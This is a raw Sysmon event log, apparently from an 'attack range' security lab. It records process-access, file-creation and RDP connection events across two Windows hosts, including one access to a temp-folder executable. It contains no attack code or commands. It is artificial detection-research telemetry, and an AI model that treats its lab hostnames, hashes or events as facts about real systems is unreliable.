Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295401Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:21.100{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295400Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:21.100{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295399Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:21.100{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295398Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:21.100{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295397Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:21.100{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-152D-6216-C006-000000003802}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295396Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:21.100{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-152D-6216-C006-000000003802}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295395Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:21.101{C8EA50B7-152D-6216-C006-000000003802}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000219504Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:21.196{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-149MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295404Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:22.969{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C56FA5E513C08B4983E72806F1CEFAC3,SHA256=1660EE73A2CFBB1C338E0880D1342D9DD8A3DB116E1DBD0D4C1D99069A710A1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219510Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:22.851{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=136FBB5050B35CD5922C8C664D5773AD,SHA256=CCE2E58992ED3F08F5C822203B15E15F77A4940E2FC74950CC88B1CCD0962B30,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219509Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:19.626{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx53896-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219508Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:22.630{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C28CE7C175E83F64EBA402127253C27,SHA256=6E5736C367F00329EB146EBCB8FF9F81F45F4B75C4F9F336E34DFB7B6CCD70F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219507Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:22.210{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-150MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295405Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:23.984{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C69744BE784E7E37ED7416951B82603B,SHA256=5063DFEDDBBFA8F5257927EB204D59279062BDF0945C944AA497FE512BF548A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219511Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:23.663{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4C2C55FD3E25E0354ED1A9D144F581A,SHA256=04815F25B3DE5BE7478D1755638851F273E6621EF8ABE9AF7E266A66BA6D49A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219512Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:24.679{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD127D538EF45CF7E00D7E6D8015A704,SHA256=5540435AF8E0B9809E658C31B88375D68004105CF77A58C83AC2C7DEE512EC25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219513Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:25.694{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3F29B9E63ADFB481C8B94E9F393805E,SHA256=E9F98EC555CA51CDAF598F32B37DE5DBA2B877176ECF839723675B627A68B3AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295407Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:22.642{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49228-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295406Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:25.000{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DED9121E680A75CD29174C00EF5A9E1E,SHA256=32DEC89245DFD5D7D34D0BD32DF0B263B7CE910999CDFC49B595C27849A586FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219517Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:26.710{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A76D814A5311387FE14A9F84D50FDD03,SHA256=A9A17A962E7A955F54EF3C6ECAF1CEBDB81C620B2D1B31F58D07863C477C7D01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295410Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:26.038{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=229974EF5D72D1D3250C66344A7264A8,SHA256=E6868DB367DA1E4D0CFADE2374A87238962BDDB7CBEFE552C592B88A65CD6B14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295409Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:26.036{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=0FF71F0FD5FE7641AB7CF738E8BAF0A1,SHA256=E73FD93BD7FE12EFF89E058155D8868E317D32804656F22A246252EF3842653E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295408Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:26.001{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41B4365940F4A21439FFBB8718B38CB5,SHA256=C6F4872ABF54B3D8C85C5144F2AE51CFB0C8C4B6460A8C13C4B6A041DFC80F72,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219516Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:24.643{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51525-false10.0.1.12-8000- 354300x8000000000000000219515Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:23.634{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx56058-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219514Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:26.335{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=434339C927A04A56550A2BA35183FB3F,SHA256=671F2F8F8B500C2C946FA6DD1A1CE5A2EE0DE35D57557CF479538E2F5DFF3073,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219518Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:27.726{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=961CC111A9F60C9915C7A85944837395,SHA256=1E7AF3C70D11B1515BBC68373CEB709973ADB2F3A17606E82347383C2F614C55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295411Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:27.035{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF4714ABE46A99723140A8892CE1D088,SHA256=20D07E3734E429A451C604285F5E256A8C5F4F8FB311BE6D5BD4592118090EF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219520Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:28.726{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56DE3C6527639471FC9DFD7DB98136CA,SHA256=181F2F71D798557C303135469D0B0A8CCB4CA470FAD262AE35D0D0E736A84EDC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219519Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:26.463{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx57458-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000295412Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:28.069{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=730CF805802B6296224D8D7F5A5296E2,SHA256=76AE78DEEACF10B157B63C4E21799BB9F2B7B88357CDF2C95A923605916A7355,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219522Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:29.897{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C5B6568075A98FFE13DF56ADB4A3C52,SHA256=37235A8CB679058ADD3D78B79DF517D084C9E41384F30D35DA3CC0BB011A1F4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295413Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:29.099{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DBEE8474A1D2128D74B48AB005C9BE5,SHA256=4333A80C8CE4EA89FA76AAF1F0512B48B92D6419BAC61156A68C717C25EF09FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219521Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:29.741{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8647F100B47AA6BE7540BA235A7D2EBF,SHA256=B02AE826046E9459115EB76EE8ADAC111E7C6F5C7533BCA6475CE7F02C35BD5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219523Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:30.397{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=6E7F7B69D2550DE71CAE82A83CC26C2A,SHA256=3D06E34AF0BA46CF2B60532510FE74A25B0A9123AF3F63E41E306F45287DAB09,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295424Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:30.916{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1536-6216-C206-000000003802}7132C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295423Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:30.885{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1536-6216-C206-000000003802}7132C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295422Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:30.738{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1536-6216-C106-000000003802}7008C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295421Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:30.737{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295420Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:30.737{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295419Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:30.737{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 